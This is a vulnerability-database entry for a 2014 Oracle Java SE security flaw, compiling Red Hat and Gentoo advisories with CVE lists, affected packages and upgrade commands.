"db": "PACKETSTORM", "id": "138826" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of DTLS Service disruption in the anti-replay functionality of the implementation (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004779" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "digital error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-102" } ], "trust": 0.6 } }
var-201404-0374
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. The vulnerability can be exploited over multiple protocols. This issue affects the 'Security' sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-ibm security update Advisory ID: RHSA-2014:0486-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0486.html Issue date: 2014-05-13 CVE Names: CVE-2013-6629 CVE-2013-6954 CVE-2014-0429 CVE-2014-0446 CVE-2014-0448 CVE-2014-0449 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 CVE-2014-0455 CVE-2014-0457 CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2398 CVE-2014-2401 CVE-2014-2402 CVE-2014-2409 CVE-2014-2412 CVE-2014-2414 CVE-2014-2420 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 CVE-2014-2428 =====================================================================
- Summary:
Updated java-1.7.0-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
- Description:
IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section. (CVE-2014-0457, CVE-2014-2421, CVE-2014-0429, CVE-2014-0461, CVE-2014-0455, CVE-2014-2428, CVE-2014-0448, CVE-2014-0454, CVE-2014-0446, CVE-2014-0452, CVE-2014-0451, CVE-2014-2402, CVE-2014-2423, CVE-2014-2427, CVE-2014-0458, CVE-2014-2414, CVE-2014-2412, CVE-2014-2409, CVE-2014-0460, CVE-2013-6954, CVE-2013-6629, CVE-2014-2401, CVE-2014-0449, CVE-2014-0459, CVE-2014-0453, CVE-2014-2398, CVE-2014-1876, CVE-2014-2420)
All users of java-1.7.0-ibm are advised to upgrade to these updated packages, containing the IBM Java SE 7 SR7 release. All running instances of IBM Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory) 1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette 1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335) 1088024 - CVE-2014-0448 Oracle JDK: unspecified vulnerability fixed in 7u55 and 8u5 (Deployment) 1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D) 1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)
- Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm
ppc: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm
s390x: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
ppc64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm
s390x: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-6629.html https://www.redhat.com/security/data/cve/CVE-2013-6954.html https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0448.html https://www.redhat.com/security/data/cve/CVE-2014-0449.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0454.html https://www.redhat.com/security/data/cve/CVE-2014-0455.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0459.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2401.html https://www.redhat.com/security/data/cve/CVE-2014-2402.html https://www.redhat.com/security/data/cve/CVE-2014-2409.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2420.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://www.redhat.com/security/data/cve/CVE-2014-2428.html https://access.redhat.com/security/updates/classification/#critical https://www.ibm.com/developerworks/java/jdk/alerts/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTcndLXlSAg2UNWIIRAidtAKC2xzybC9AZogqPqbKlnVNtoXAK9gCghl3w 7WuHx5m587mnR/PKDaPZlzw= =q8QV -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201502-12
http://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: February 15, 2015 Bugs: #507798, #508716, #517220, #525464 ID: 201502-12
Synopsis
Multiple vulnerabilities have been found in Oracle's Java SE Development Kit and Runtime Environment, the worst of which could lead to execution of arbitrary code. Please review the CVE identifiers referenced below for details.
Impact
A context-dependent attacker may be able to execute arbitrary code, disclose, update, insert, or delete certain data.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.71"
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.71"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.71"
References
[ 1 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 2 ] CVE-2014-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432 [ 3 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 4 ] CVE-2014-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448 [ 5 ] CVE-2014-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449 [ 6 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 7 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 8 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 9 ] CVE-2014-0454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454 [ 10 ] CVE-2014-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455 [ 11 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 12 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 13 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 14 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 15 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 16 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 17 ] CVE-2014-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463 [ 18 ] CVE-2014-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464 [ 19 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 20 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 21 ] CVE-2014-2401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401 [ 22 ] CVE-2014-2402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402 [ 23 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 24 ] CVE-2014-2409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409 [ 25 ] CVE-2014-2410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410 [ 26 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 27 ] CVE-2014-2413 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413 [ 28 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 29 ] CVE-2014-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420 [ 30 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 31 ] CVE-2014-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422 [ 32 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 33 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427 [ 34 ] CVE-2014-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428 [ 35 ] CVE-2014-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483 [ 36 ] CVE-2014-2490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490 [ 37 ] CVE-2014-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208 [ 38 ] CVE-2014-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209 [ 39 ] CVE-2014-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216 [ 40 ] CVE-2014-4218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218 [ 41 ] CVE-2014-4219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219 [ 42 ] CVE-2014-4220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220 [ 43 ] CVE-2014-4221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221 [ 44 ] CVE-2014-4223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223 [ 45 ] CVE-2014-4227 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227 [ 46 ] CVE-2014-4244 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244 [ 47 ] CVE-2014-4247 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247 [ 48 ] CVE-2014-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252 [ 49 ] CVE-2014-4262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262 [ 50 ] CVE-2014-4263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263 [ 51 ] CVE-2014-4264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264 [ 52 ] CVE-2014-4265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265 [ 53 ] CVE-2014-4266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266 [ 54 ] CVE-2014-4268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268 [ 55 ] CVE-2014-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288 [ 56 ] CVE-2014-6456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456 [ 57 ] CVE-2014-6457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457 [ 58 ] CVE-2014-6458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458 [ 59 ] CVE-2014-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466 [ 60 ] CVE-2014-6468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468 [ 61 ] CVE-2014-6476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476 [ 62 ] CVE-2014-6485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485 [ 63 ] CVE-2014-6492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492 [ 64 ] CVE-2014-6493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493 [ 65 ] CVE-2014-6502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502 [ 66 ] CVE-2014-6503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503 [ 67 ] CVE-2014-6504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504 [ 68 ] CVE-2014-6506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506 [ 69 ] CVE-2014-6511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511 [ 70 ] CVE-2014-6512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512 [ 71 ] CVE-2014-6513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513 [ 72 ] CVE-2014-6515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515 [ 73 ] CVE-2014-6517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517 [ 74 ] CVE-2014-6519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519 [ 75 ] CVE-2014-6527 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527 [ 76 ] CVE-2014-6531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531 [ 77 ] CVE-2014-6532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532 [ 78 ] CVE-2014-6558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558 [ 79 ] CVE-2014-6562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201502-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):
1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory) 1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette 1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767) 1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758) 1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126) 1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026) 1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193) 1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306) 1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018) 1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034) 1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786) 1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417) 